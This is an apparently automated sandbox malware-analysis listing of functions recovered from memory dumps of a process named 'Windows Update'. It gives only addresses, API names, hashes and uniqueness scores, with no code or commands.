                                                                                  • Opcode Fuzzy Hash: 28a68cdfa7dd8178d1a456d68c45839ca7a13247e4b73e58f9a3c4cf570bf764
                                                                                  • Instruction Fuzzy Hash: 62219871509380AFE721CF55DD45F96FFB8EF06310F0884AEE9449B292D375A904CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AB011, Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: VnRh
                                                                                  • API String ID: 0-1183825908
                                                                                  • Opcode ID: 8bc2e51aefc6c72028eed4216906ceaac8f0e492012f5bc18d7298694d665f61
                                                                                  • Instruction ID: 1a4d0dfb7c5e3885612538ae47d02407057f236dabf7f78c3e47843f97b2a7e5
                                                                                  • Opcode Fuzzy Hash: 8bc2e51aefc6c72028eed4216906ceaac8f0e492012f5bc18d7298694d665f61
                                                                                  • Instruction Fuzzy Hash: 9411E976544340AFD3118F16AC45AA7FFA4EF46630F08C8AFED489F212D276A504CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642F5E, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocLocal
                                                                                  • String ID:
                                                                                  • API String ID: 3494564517-0
                                                                                  • Opcode ID: 5ee18651975b925edce73d96faf3603fb06ec8e1aafcec2d7b625654f62552c9
                                                                                  • Instruction ID: 5520c4bdd945e5193f363770ea768b5db5e0e049a1c33b892f7079b2657f578f
                                                                                  • Opcode Fuzzy Hash: 5ee18651975b925edce73d96faf3603fb06ec8e1aafcec2d7b625654f62552c9
                                                                                  • Instruction Fuzzy Hash: 2711BE71504300EFF720DF55DC85BAAFBA8EF09720F5484AAED488B382D775A904CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A2D6, Relevance: 1.3, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 3853573aa8f998338d133c5c889304c84aac50a7e5fe08ed9a7608c3cceca36e
                                                                                  • Instruction ID: 2212ea4bb3fac864474af7f810d8aa858b6026ef38182090b751ac16302baf9d
                                                                                  • Opcode Fuzzy Hash: 3853573aa8f998338d133c5c889304c84aac50a7e5fe08ed9a7608c3cceca36e
                                                                                  • Instruction Fuzzy Hash: 2C11A7715093C09FD712CF25DC55B96BFA4EF02220F0884EBED898F653D2759948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A87F, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LocalFree.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A8E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2826327444-0
                                                                                  • Opcode ID: f3614cbfaae64b9b751a6849f34c7c3a849abfa9c196ba5e2c138af1c2ea0702
                                                                                  • Instruction ID: 7cf7fc83c3835b0b9b288d40fcce8afd622cd8006706ba2e3ac03027f691d5d3
                                                                                  • Opcode Fuzzy Hash: f3614cbfaae64b9b751a6849f34c7c3a849abfa9c196ba5e2c138af1c2ea0702
                                                                                  • Instruction Fuzzy Hash: 2A1182715493849FD712CB15DC45B92BFB4EF06224F0884EAED458B253D276A948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A2FA, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 826ea89a47d8685b6877be3624331e837c2f2b9615136c37cc49a075a053d1f8
                                                                                  • Instruction ID: edd456db4fac67c04d0b30756014c7419dfeed016a84e892d0b32bdb05d6f891
                                                                                  • Opcode Fuzzy Hash: 826ea89a47d8685b6877be3624331e837c2f2b9615136c37cc49a075a053d1f8
                                                                                  • Instruction Fuzzy Hash: 2501F275901300CFEB14CF15DC857A6FF94EF00720F48C4BADC098B242D775A844CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A8AE, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LocalFree.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A8E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2826327444-0
                                                                                  • Opcode ID: b8a10781ff672d34be2be28613a7870bc2ab79df5655042cbb4f36a5a06c36e9
                                                                                  • Instruction ID: 045ce73ed646a5980dcfe992ede10051992d9cdc4200ec514d1d7d0a6981dc19
                                                                                  • Opcode Fuzzy Hash: b8a10781ff672d34be2be28613a7870bc2ab79df5655042cbb4f36a5a06c36e9
                                                                                  • Instruction Fuzzy Hash: C701AD71501344DFEB10CF15D8897A6FFA4EF00321F58C4AADD088B202D375A984CAA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA83A, Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e40e7c6457e8972aad57c3c62879c980e143c9b5793afa0b7441e24bda88826
                                                                                  • Instruction ID: 35ed6c42f69a88bb5d7e262290e2fb9b33eda5fcb73edf7200730a95585d17de
                                                                                  • Opcode Fuzzy Hash: 7e40e7c6457e8972aad57c3c62879c980e143c9b5793afa0b7441e24bda88826
                                                                                  • Instruction Fuzzy Hash: F8210CB6508304AFD350CF49EC41A57FBE8EB88660F14C92EFD4997311D276A9148BA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA97E, Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b988b3270299d261c8a657ad88cab31d1452daf90c995c87e1904da97d64039
                                                                                  • Instruction ID: bc4d955dfa42190b8e3801065c4ab64c16289b4aa6560cbb8433a7121c01c990
                                                                                  • Opcode Fuzzy Hash: 0b988b3270299d261c8a657ad88cab31d1452daf90c995c87e1904da97d64039
                                                                                  • Instruction Fuzzy Hash: 2B211DB6508304AFD750CF09EC41A57FBE8EB88670F14C92EFD4997311D276E9148BA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F13BE, Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b7619e54ecb7eade4a47130d6279fed4bb527720fb2959a510e835376a942c8c
                                                                                  • Instruction ID: 1896e63b581444b0d76de06ad8b13511ca00ed11435091c10ced0f488795f2e1
                                                                                  • Opcode Fuzzy Hash: b7619e54ecb7eade4a47130d6279fed4bb527720fb2959a510e835376a942c8c
                                                                                  • Instruction Fuzzy Hash: D421B4B5508341AFD340CF19D881A5BBBE4EB89664F04896EF89897311E275E9058BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1E30, Relevance: .1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4785dffd1a50a299d9779577d9b03c17ecb1a890ee7c9e4ba9192db5167ca748
                                                                                  • Instruction ID: 4267eca555cb7afda3c42663ee879ef443643bba043f3ce7059d52ff4b1535ef
                                                                                  • Opcode Fuzzy Hash: 4785dffd1a50a299d9779577d9b03c17ecb1a890ee7c9e4ba9192db5167ca748
                                                                                  • Instruction Fuzzy Hash: F711B7B5908301AFD340CF19D881A5BFBE4FB88664F04896EF998D7311E271E9048FA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00600984, Relevance: .1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 19bc690a4f737fec63811d5e63e0b9b3a4ced17f888838b65d588a5fa37892dc
                                                                                  • Instruction ID: ccede7782b0edf9216aed57dfd6d4ef7da750597489fed31310cb231651a00bc
                                                                                  • Opcode Fuzzy Hash: 19bc690a4f737fec63811d5e63e0b9b3a4ced17f888838b65d588a5fa37892dc
                                                                                  • Instruction Fuzzy Hash: 5911E435248384DFE319CB14C880B56B792EB88708F24C5ADE9490B783C73BD803DA41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0062304C, Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25e4fd7361760ea476f5459a0f6280bea6510325a653750bccc5babd172b74c1
                                                                                  • Instruction ID: 6c239f80719e91eb5d72e0cea6bbbbeeed2a2dfe83a816d7eff7ae29bc34a58b
                                                                                  • Opcode Fuzzy Hash: 25e4fd7361760ea476f5459a0f6280bea6510325a653750bccc5babd172b74c1
                                                                                  • Instruction Fuzzy Hash: 4B11D631244B94DFD715CB14E584B25BB92EB85708F28C5ADE8490B742C73FD903CE61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0060095A, Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 737154f2f48d4167351ac4373f64e4788b22ca309bd0bfcc742c62f7069a5e2e
                                                                                  • Instruction ID: 0996bfd798f149fca64fec3c46930ced84c232ebbc01da1a6178a53516e8c296
                                                                                  • Opcode Fuzzy Hash: 737154f2f48d4167351ac4373f64e4788b22ca309bd0bfcc742c62f7069a5e2e
                                                                                  • Instruction Fuzzy Hash: 8C215C3524D3C49FD716CB60C890B51BFB2AF5B704F1886DED4898B6A3C73A8806DB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1CD4, Relevance: .1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4d4f46000a436ba1987421ec496b03b1bb87faae0b4d7154fb761634d3e8a28
                                                                                  • Instruction ID: de0c6a2ecafef38ca4e669b4bb4f73592aa561384d8f0fc19d127f5e47230ee9
                                                                                  • Opcode Fuzzy Hash: f4d4f46000a436ba1987421ec496b03b1bb87faae0b4d7154fb761634d3e8a28
                                                                                  • Instruction Fuzzy Hash: 4D11BAB5508301AFD350CF49DC85E5BFBE8EB88660F04892EFD9997311D271E9088FA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AAF78, Relevance: .1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5d8c871b11e188385600cf445bb76538c396f2de27b473fa07f86b927cdaa2ff
                                                                                  • Instruction ID: 93f83b993b38c6dbc284b83af1e86b87949d37ba92f2f8a5bd29fcc4373ce22b
                                                                                  • Opcode Fuzzy Hash: 5d8c871b11e188385600cf445bb76538c396f2de27b473fa07f86b927cdaa2ff
                                                                                  • Instruction Fuzzy Hash: 5E11BAB5508301AFD350CF49DC41E5BFBE9EB88660F04892EFD9997311D271E9048FA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0062302E, Relevance: .0, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7814d606b2fd3036dcd205b2c7e84d4431138482a9a625aafe7c131a7ca8038a
                                                                                  • Instruction ID: dea240a82056be498c5e405f954685fe84c35e325f469be778b2109fa7fc336c
                                                                                  • Opcode Fuzzy Hash: 7814d606b2fd3036dcd205b2c7e84d4431138482a9a625aafe7c131a7ca8038a
                                                                                  • Instruction Fuzzy Hash: 401179302086C08FD712CB20D850B51BFB2AF56714F1886EED8884B6A3C73A8806DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006007F7, Relevance: .0, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 852cce166d25ecb805afd99f9c437f380c983e3a1d0e77a61b8f8a202004cb10
                                                                                  • Instruction ID: 73b67854d5d2dd5c5f9f3f4c6a56b8a5ab2f2437446f7ac98599c3792c6da5b4
                                                                                  • Opcode Fuzzy Hash: 852cce166d25ecb805afd99f9c437f380c983e3a1d0e77a61b8f8a202004cb10
                                                                                  • Instruction Fuzzy Hash: 8401D6B65093806FD7018B06AC44863FFF8EF87630748C19FEC898B652D226A905CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00600A40, Relevance: .0, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction ID: bf511f599da92507b1a2d94832f9ebcdd4997f61ca709f62d124673b16064da2
                                                                                  • Opcode Fuzzy Hash: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction Fuzzy Hash: 49F03C35248644DFD306CF14D940B56FBA2FB89718F24C6ADE9491B762C737E813DA81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00623104, Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f10923213c14f3d098aabe34cfdbf77621fbd2db08793df75a2ea6ce7e91e70
                                                                                  • Instruction ID: 71a32a7dc6f0dbe6f801aec4d4e089c0d7588f09a712ba759749ac778a96bfb2
                                                                                  • Opcode Fuzzy Hash: 8f10923213c14f3d098aabe34cfdbf77621fbd2db08793df75a2ea6ce7e91e70
                                                                                  • Instruction Fuzzy Hash: 3BF03C35248A84DFC316CF14E940B25FBA2FB89718F24C6ADE9480B752C73B9913DE91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0060081E, Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 09b6a177b44a95f1ba74bf6d6e02304bd4ac871766bd6f8bef600c7cd40f5919
                                                                                  • Instruction ID: 153d14e3f4b50d7cf3218eb8175eaf9ad562c8b78bf29b644025a2b35f8330da
                                                                                  • Opcode Fuzzy Hash: 09b6a177b44a95f1ba74bf6d6e02304bd4ac871766bd6f8bef600c7cd40f5919
                                                                                  • Instruction Fuzzy Hash: 8FE092766017008BD750CF0AEC41852F794EB84A30B48C47FDC0D8B710D236B504CAA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1433, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 772700fd40e65d8c35c24a4f166697761baea93b5179249611458639f30ce212
                                                                                  • Instruction ID: ed8c5f981fd13fab8e15cf5937c97eaba201951683ca2ea267151f63066d120c
                                                                                  • Opcode Fuzzy Hash: 772700fd40e65d8c35c24a4f166697761baea93b5179249611458639f30ce212
                                                                                  • Instruction Fuzzy Hash: 4EE0207250030067D2108F069C46F53FB98DB40A70F04C467ED0C1F302E172B51489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1D23, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df3d9afc87d3a7312583272eb2c3288fc025d9ca79f804545cc38e63c04e57af
                                                                                  • Instruction ID: 0eb31ed8abffedd3f681285205bbc07ffb7c3e3ac900d2b1982edf6dc5e33ea4
                                                                                  • Opcode Fuzzy Hash: df3d9afc87d3a7312583272eb2c3288fc025d9ca79f804545cc38e63c04e57af
                                                                                  • Instruction Fuzzy Hash: AAE0207250030467D2109F069C4AF53FB98DB40A70F04C567ED0D1F312E173B50489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1747, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a9be190e88ab30ee6463b137feaced439edcc0fb1159568fa26d520ff982356
                                                                                  • Instruction ID: 551325b9def231e56785d9435ab41338521b35517bf1ef268581bf125c00e392
                                                                                  • Opcode Fuzzy Hash: 1a9be190e88ab30ee6463b137feaced439edcc0fb1159568fa26d520ff982356
                                                                                  • Instruction Fuzzy Hash: C2E0D87250030067D2109F069C46F53FB98DB50A70F44C467ED081B306E177B51489E5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 043F1E9B, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88f524d342e6e05da564f58e0309c7d55a62bdadfd93b1649961e1399fea37db
                                                                                  • Instruction ID: f73c5a646af01bb1672ebc1d697a772ab9a6694efd5873bb77531cce46250273
                                                                                  • Opcode Fuzzy Hash: 88f524d342e6e05da564f58e0309c7d55a62bdadfd93b1649961e1399fea37db
                                                                                  • Instruction Fuzzy Hash: 7CE0207254030067D2108F069C46F53FB98DB40A70F04C467ED0C1F702E172B5148BF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA90B, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77937a48c9625dd5a882cb9919e49c5d4524d2de1d9519a2d64f1d07cbe2868d
                                                                                  • Instruction ID: 64c79aa1c0b39f4b772a0418239045c5274d84dae0c2b43a7e1585381700f5a1
                                                                                  • Opcode Fuzzy Hash: 77937a48c9625dd5a882cb9919e49c5d4524d2de1d9519a2d64f1d07cbe2868d
                                                                                  • Instruction Fuzzy Hash: 8AE026B294030467E2108F06AC46F63FB98EB40A71F08C96BED0C1F342E1B2B9048AF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AAFC7, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ef67a4d17ca05243621f42ded792c9f7af90ee34d6eefa9d66b63c26e56d9e5
                                                                                  • Instruction ID: 5c12a018589fc9814a3020c9ecbea985c66cee1bfab2f41d179a5ca7d4351e51
                                                                                  • Opcode Fuzzy Hash: 0ef67a4d17ca05243621f42ded792c9f7af90ee34d6eefa9d66b63c26e56d9e5
                                                                                  • Instruction Fuzzy Hash: F7E0DFB294030467E2108E06AC46F63FB98EB40A70F08C86BEE081B312E172B9048AF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AA7C7, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20906cbc5e1e99aac9df2969dd1b724dabdfcf17a7f4e9690a689ceaf110d9ed
                                                                                  • Instruction ID: ccb4bf8176ec5e280b7a44c08f4d594bce1f1b6d8445c1326c6410af0f3a1609
                                                                                  • Opcode Fuzzy Hash: 20906cbc5e1e99aac9df2969dd1b724dabdfcf17a7f4e9690a689ceaf110d9ed
                                                                                  • Instruction Fuzzy Hash: 53E0207250030467D2109F069C46F53FB98EB40A70F04C467ED0C1F303E172B50489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001123F4, Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110359352.0000000000112000.00000040.00000001.sdmp, Offset: 00112000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_112000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c8d67293bd00f4d211ba116c4f78e1c040f5096de94f641b7d94020da0dbe21
                                                                                  • Instruction ID: 2a74115fb89dc8862e691bdbf8618aba6cc5f9f88dd70b174dc63196db9337eb
                                                                                  • Opcode Fuzzy Hash: 6c8d67293bd00f4d211ba116c4f78e1c040f5096de94f641b7d94020da0dbe21
                                                                                  • Instruction Fuzzy Hash: 79D05EB9304A818FD71A8A1CC1A4B9537D4AB51B04F5644F9E800CBAA3C778E9D1D200
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001123BC, Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
